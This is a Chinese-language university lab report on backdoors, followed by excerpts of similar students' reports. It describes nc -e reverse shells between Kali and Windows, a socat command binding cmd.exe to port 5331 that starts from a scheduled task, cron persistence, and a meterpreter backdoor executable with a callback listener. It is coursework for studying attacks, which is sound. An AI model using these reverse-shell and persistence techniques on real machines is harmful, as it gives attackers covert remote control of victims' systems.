20145331魏澍琛《网络对抗》Exp2 后门原理与实践

20145331魏澍琛《网络对抗》Exp2 后门原理与实践

基础问题回答

(1)例举你能想到的一个后门进入到你系统中的可能方式?

上网时候弹出一个广告说你中奖了,或者你可以贷款10万元之类的,你一激动一点进去后门就进入你的系统了。

(2)例举你知道的后门如何启动起来(win及linux)的方式?

比如下载一个游戏,下下来你会发现除了游戏快捷方式还有什么游戏大厅、游戏加速,或者什么最新的网页游戏(传奇狂暴版),你一好奇一点进去后门就启动了。

(3)Meterpreter有哪些给你映像深刻的功能?

能控制你的摄像头,你在偷偷干一些骚事情以为不留痕迹的时候其实别人也能看到。

屏幕截图,你在电脑上看一些骚东西的时候别人可以截图,发现你是一个骚人。

(4)如何发现自己有系统有没有被安装后门?
后门的花杀毒软件应该杀得出来吧,别的不知道了.....

常用后门工具实践

Windows获得Linux Shell

1、windows下,先看本机ip

2、下载ncat.exe,并监听学号端口(5331)

3、kali下,用nc -e 反向连接Windows主机的5331端口

4、Windows下成功获得了一个Kali的shell

Linux获得Windows Shell

1、kali下,查看ip

2、用nc指令监听5331端口

3、Windows下,使用ncat.exe程序 -e 参数反向连接Kali主机的5331端口

4、Kali下可以输入Windows命令

使用nc传输数据

把上面的工作重复一遍,你会发现kali和windows间可以聊天,这个老师上课演示过了

实验内容

使用netcat获取主机操作Shell,cron启动

1、Windows下,监听5331端口

2、用crontab -e指令编辑一个周期性任务

(少截了一张图。。。。。见谅)

3、windows获得kali的shell

使用socat获取主机操作Shell, 任务计划启动

1、新建一个触发器(控制面板>小图标显示>管理工具>任务计划程序,win10挺难找的)

2、写入socat.exe文件的路径,在添加参数一栏填写tcp-listen:5331 exec:cmd.exe,pty,stderr,把cmd.exe绑定到端口5331,同时把cmd.exe的stderr重定向到stdout上

3、kali下获得了cmd shell

使用MSF meterpreter生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell

//做这个实验时换了wifi,因此ip地址和上文有冲突,不过都还是自己做的,不会和别人撞图。

1、生成后门程序

2、前面讲了那么多联系两个主机的方法,用nc连接把后门传到windows上

3、在kali下进入msf控制台,设置相关参数(回联的ip地址+端口号)

4、进行监听

5、打开后门程序

C:\ncat\20145331_backdoor.exe   (又忘截图了。。。。下不为例)

6、enjoy it

感悟:实验非常好玩,也不是很难,但是我感觉植入后门的时候有点太假了,做的后门第一次没关防火墙的时候直接被kill了,感叹防火墙的能力同时感觉自己应该再了解一些植入后门程序的方法。

时间: 2024-10-03 14:46:47

20145331魏澍琛《网络对抗》Exp2 后门原理与实践的相关文章

20154306 刘宇轩 网络对抗EXP2后门原理与实践

一.实践目标与内容 1.学习内容 使用nc实现win,mac,Linux间的后门连接 meterpreter的应用 MSF POST 模块的应用 2.学习目标 学习建立一个后门连接,并了解其中的知识点,同时熟悉后门连接的功能.通过亲手实践并了解这一事实,提高自己的安全意识 . 3.概念 后门就是不经过正常认证流程而访问系统的通道. netcat是一个底层工具,进行基本的TCP UDP数据收发.常被与其他工具结合使用,起到后门的作用. socat是ncat的增强版,它使用的格式是socat [op

20155305《网络对抗》后门原理与实践

20155305<网络对抗>后门原理与实践 实验过程(基本后门工具实践) 1.Win获取Linux shell (1)Win在cmd.exe中使用ipconfig命令查看主机的IP. (2)Win下载老师的下载地址比较方便.解压ncat压缩包,在cmd中进入ncat文件夹中,使用ncat.exe -l -p 5305命令运行ncat.exe监听5305端口. (3)Linux在终端窗口使用nc Win的IP 端口号 -e /bin/sh命令去连接Win的5305端口. 连接成功后就可以在Win

20155302 Exp2 后门原理与实践

20155302<网络对抗>后门原理与实践 实验要求 1.使用netcat获取主机操作Shell,cron启动 (0.5分) 2.使用socat获取主机操作Shell, 任务计划启动 (0.5分) 3.使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell(0.5分) 4.使用MSF meterpreter(或其他软件)生成获取目标主机音频.摄像头.击键记录等内容,并尝试提权 (2分) 5.可选加分内容:使用MSF生成shel

20145331魏澍琛《网络对抗》——免杀原理与实践

20145331魏澍琛<网络对抗>--免杀原理与实践 问题回答 1.杀软是如何检测出恶意代码的? 一个是基于特征码的检测,第二个是启发式恶意软件检测,最后是基于行为的恶意软件检测 2.免杀是做什么? 让病毒不被杀毒软件kill掉 3.免杀的基本方法有哪些? a)可以用这次实验所涉及的改变特征码 b)加壳:就是相当于把你的后门代码封装起来,但是现在大部分公开的壳都能被杀毒软件查出来,效果其实不好 实践过程 一.使用msf生成后门程序的检测 1.用上节课所讲的msf生成一个后门 2.到相应网站上查

20145331魏澍琛《网络对抗》Exp8 Web基础

20145331魏澍琛<网络对抗>Exp8 Web基础 实践内容: 1.简单的web前端页面(HTML.CSS等) 2.简单的web后台数据处理(PHP) 3.Mysql数据库 4.一个简单的web登陆页面例子 5.SQL注入.XSS攻击 Web前端:HTML基础 1.先将apache的端口号设为80(上节已经设置好了),接着结束掉占用80端口的进程,再启动apache. 2.在/var/www/html目录下创建20145331wsc.html文件,即前端文件. 附:检查第一步是否成功只需在

20145331魏澍琛 《网络对抗技术》 PC平台逆向破解

20145331魏澍琛 <网络对抗技术> PC平台逆向破解 学习任务 1.shellcode注入:shellcode实际是一段代码,但却作为数据发送给受攻击服务器,将代码存储到对方的堆栈中,并将堆栈的返回地址利用缓冲区溢出,覆盖成为指向 shellcode 的地址. 2.Return-to-libc 攻击实验:即使栈有不可执行的能力,无法将shellcode放入堆栈中运行,但我们却可以直接让漏洞程序调转到现存的代码来实现我们的攻击. 注入Shellcode并执行 1.设置环境 2.以 anyt

20145317彭垚《网络对抗》Exp2 后门原理与实践

20145317彭垚<网络对抗>Exp2 后门原理与实践 基础问题回答 例举你能想到的一个后门进入到你系统中的可能方式? 在网上下载软件的时候,后门很有可能被捆绑在下载的软件当中: 例举你知道的后门如何启动起来(win及linux)的方式? Windows下在控制面板的管理工具中可以设置任务计划启动,或者通过修改注册表来达到自启的目的: 对后门程序进行伪装,例如重命名成某个游戏的开始程序之类的,诱骗用户点击启动: Linux下可以通过cron来启动. Meterpreter有哪些给你映像深刻的

20155338《网络对抗》Exp2 后门原理与实践

20155338<网络对抗>Exp2 后门原理与实践 一. 基础问题 (1)例举你能想到的一个后门进入到你系统中的可能方式? 答:游览网站中附带的广告或弹出的不正规软件. (2)例举你知道的后门如何启动起来(win及linux)的方式? 答:1.操作系统自带服务: 2.网络协议捆绑: 3.软件编写者制作: 4.漏洞攻击后放置: (3)Meterpreter有哪些给你映像深刻的功能 答:录屏,提升权限和录音. (4)如何发现自己有系统有没有被安装后门 答:用网络命令来看计算机所连接的设备有没有陌

2018-2019-2 20165212《网络对抗技术》Exp2 后门原理与实践

2018-2019-2 20165212<网络对抗技术>Exp2 后门原理与实践 1.实验内容 (1)使用netcat获取主机操作Shell,cron启动 (2)使用socat获取主机操作Shell, 任务计划启动 (3)使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell (4)使用MSF meterpreter(或其他软件)生成获取目标主机音频.摄像头.击键记录等内容,并尝试提权 (5)可选加分内容:使用MSF生成she